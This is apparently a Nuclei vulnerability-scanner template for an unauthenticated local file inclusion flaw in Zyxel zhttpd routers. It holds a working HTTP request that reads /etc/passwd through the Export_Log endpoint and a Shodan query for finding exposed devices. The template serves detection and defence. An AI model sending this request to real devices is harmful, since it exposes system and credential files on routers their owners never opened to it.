id: unauth-lfd-zhttpd info: name: zhttpd - Local File Inclusion author: EvergreenCartoons severity: high description: | zhttpd is vulnerable to unauthenticated local inclusion including privileged files such as /etc/shadow. An attacker can read all files on the system by using this endpoint. reference: - https://sec-consult.com/blog/detail/enemy-within-unauthenticated-buffer-overflows-zyxel-routers/ - https://sec-consult.com/vulnerability-lab/advisory/multiple-critical-vulnerabilities-in-multiple-zyxel-devices/ - https://github.com/rapid7/metasploit-framework/pull/17388 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cwe-id: CWE-22 metadata: max-request: 1 verified: true shodan-query: http.html:"VMG1312-B10D" tags: misconfig,unauth,zyxel,lfi,msf http: - raw: - | GET /Export_Log?/etc/passwd HTTP/1.1 Host: {{Hostname}} Accept: */* matchers-condition: and matchers: - type: regex part: body regex: - "root:.*:0:0:" - type: word part: header words: - 'application/octet-stream' - type: status status: - 200 # Enhanced by mp on 2023/01/15